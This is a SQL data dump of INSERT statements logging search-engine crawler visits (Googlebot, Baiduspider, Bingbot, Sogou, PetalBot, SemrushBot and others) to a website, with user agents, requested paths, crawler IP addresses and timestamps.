INSERT INTO `ey_weapp_spider_visit` VALUES ('96158', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/217.html', '58.250.125.127', '1661211949', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96159', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20.html', '116.179.32.176', '1661213920', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96145', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/140.html', '216.244.66.194', '1661205212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96265', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/94.html', '114.119.151.153', '1661233170', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96266', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/296.html', '220.181.108.91', '1661233559', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96135', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/232.html', '66.249.79.108', '1661203473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96281', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.168', '1661240920', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96283', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/152.html', '116.179.32.108', '1661240921', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96285', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/173.html', '185.191.171.21', '1661241119', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96134', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/114.html', '114.119.151.155', '1661203441', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96136', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/baishan.html', '114.119.151.153', '1661203579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96128', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.112', '1661199684', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96129', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/403.html', '157.55.39.153', '1661200225', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96289', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/qiyexinwen/', '66.249.79.112', '1661241972', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96133', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/310.html', '114.119.151.155', '1661203181', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96127', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/52_4.html', '66.249.79.110', '1661199555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96293', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_7.html', '185.191.171.38', '1661242722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96126', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/174.html', '185.191.171.42', '1661199488', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96290', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/28.html', '220.181.108.177', '1661242157', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96125', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_59/', '66.249.79.110', '1661197024', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96294', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/12.html', '116.179.32.138', '1661242982', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96291', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/204.html', '157.55.39.90', '1661242235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96292', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/76.html', '220.181.108.94', '1661242569', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96156', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/228.html', '58.250.125.149', '1661211916', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96254', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '220.181.108.147', '1661228649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96117', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_16.html', '185.191.171.35', '1661193507', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96119', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/485.html', '157.55.39.117', '1661195111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96112', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_42/', '216.244.66.194', '1661192078', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96111', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661191691', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96113', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/490.html', '123.125.109.144', '1661192574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96103', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/70.html', '114.119.151.155', '1661187672', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96095', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ms.html', '114.119.151.155', '1661184963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96096', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/230.html', '61.135.159.195', '1661185262', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96295', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/191.html', '220.181.108.175', '1661243392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96094', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/493.html', '58.250.125.130', '1661182921', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96296', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/84.html', '185.191.171.39', '1661243514', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96089', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/', '162.55.86.60', '1661181292', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96093', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jhs.html', '114.119.151.153', '1661182786', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96090', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/53.html', '114.119.151.153', '1661181566', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96286', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/497.html', '220.181.108.91', '1661241333', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96086', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/403.html', '66.249.79.110', '1661179755', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96100', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.112', '1661186321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96116', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661193149', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96083', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_2.html', '185.191.171.33', '1661178493', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96097', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661185565', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96123', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_2/', '66.249.79.110', '1661196016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96082', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/list_4_2', '114.119.151.153', '1661177672', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96099', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.108', '1661186321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96120', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/398.html', '185.191.171.11', '1661195270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96101', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/227.html', '58.250.125.115', '1661187116', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96104', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/400.html', '185.191.171.42', '1661188754', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96115', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/403.html', '66.249.79.112', '1661193002', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96071', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_21/', '114.119.151.153', '1661171345', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96087', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/205.html', '66.249.79.108', '1661179764', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96091', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/220.html', '49.7.21.102', '1661182057', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96070', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/38.html', '185.191.171.6', '1661171153', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96287', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/', '220.181.108.158', '1661241435', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96279', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/488.html', '220.181.108.84', '1661238467', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96069', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/496.html', '118.184.177.5', '1661170320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96067', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/92.html', '116.179.32.39', '1661170091', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96063', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/message/', '17.121.115.146', '1661168266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96058', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/444.html', '114.119.151.153', '1661164833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96047', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_3.html', '185.191.171.10', '1661159947', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96049', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661161455', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96061', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/74.html', '185.191.171.18', '1661165506', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96046', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/honor/', '66.249.79.110', '1661159698', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96041', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/492.html', '58.250.125.87', '1661156838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96033', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.110', '1661154744', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96031', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tl.html', '114.119.151.153', '1661154504', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96032', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_6', '114.119.151.153', '1661154602', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96040', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/182.html', '114.119.151.153', '1661156817', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96278', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/puershi.html', '114.119.151.155', '1661238056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96277', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/list_4_2/', '114.119.151.153', '1661237587', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96141', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/cmq.html', '114.119.151.153', '1661204589', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96138', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/', '114.119.151.153', '1661204034', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96131', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/205.html', '207.46.13.9', '1661202224', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96288', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/429.html', '116.179.32.37', '1661241747', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96130', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.110', '1661200508', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96132', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/171.html', '114.119.151.155', '1661202552', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96124', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/9_40.html', '66.249.79.112', '1661196098', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96122', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/486.html', '61.135.159.209', '1661195899', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96109', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/52_4.html', '66.249.79.108', '1661190338', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96108', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.108', '1661190328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96107', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661190285', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96110', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_59/', '66.249.79.110', '1661191666', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96114', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/231.html', '220.181.108.105', '1661192644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96105', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/263.html', '185.191.171.16', '1661189736', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96118', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/121.html', '185.191.171.6', '1661194241', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96102', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/176.html', '114.119.151.153', '1661187318', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96098', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.108', '1661186319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96088', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/58.html', '66.249.79.108', '1661179932', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96080', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/21.html', '185.191.171.10', '1661177307', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96297', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/199.html', '185.191.171.3', '1661243538', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96078', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/60.html', '185.191.171.13', '1661175982', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96079', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/203.html', '114.119.151.155', '1661177089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96076', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/154.html', '185.191.171.5', '1661174782', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96075', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/', '116.179.32.49', '1661174508', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96077', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/31_8.html', '220.181.108.178', '1661174797', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96298', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/31_8.html', '220.181.108.145', '1661243804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96074', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/219.html', '118.184.177.123', '1661173865', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96084', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19_3.html', '185.191.171.36', '1661178853', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96064', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/', '66.249.79.112', '1661168753', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96280', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/117.html', '185.191.171.9', '1661238646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96062', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/222.html', '185.191.171.10', '1661166994', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96139', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/390.html', '114.119.151.153', '1661204125', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96012', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/222.html', '118.184.177.113', '1661145207', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96015', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1661145813', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96330', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/139.html', '185.191.171.5', '1661254358', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96007', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661142884', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96004', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/213.html', '116.179.32.93', '1661140636', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96009', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/108.html', '114.119.151.155', '1661143038', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96010', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1661143067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96011', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/225.html', '116.179.32.82', '1661143912', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96002', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1661140420', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96275', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '180.163.220.100', '1661236881', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96276', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tianshui.html', '114.119.151.155', '1661237494', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96137', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/huz.html', '114.119.151.153', '1661203670', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96003', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/message', '114.119.151.155', '1661140433', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96001', '99', 'mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)', '/news/102.html', '103.131.71.134', '1661139308', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95996', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/125.html', '185.191.171.42', '1661137660', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96018', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/113.html', '116.179.32.113', '1661147182', '0');
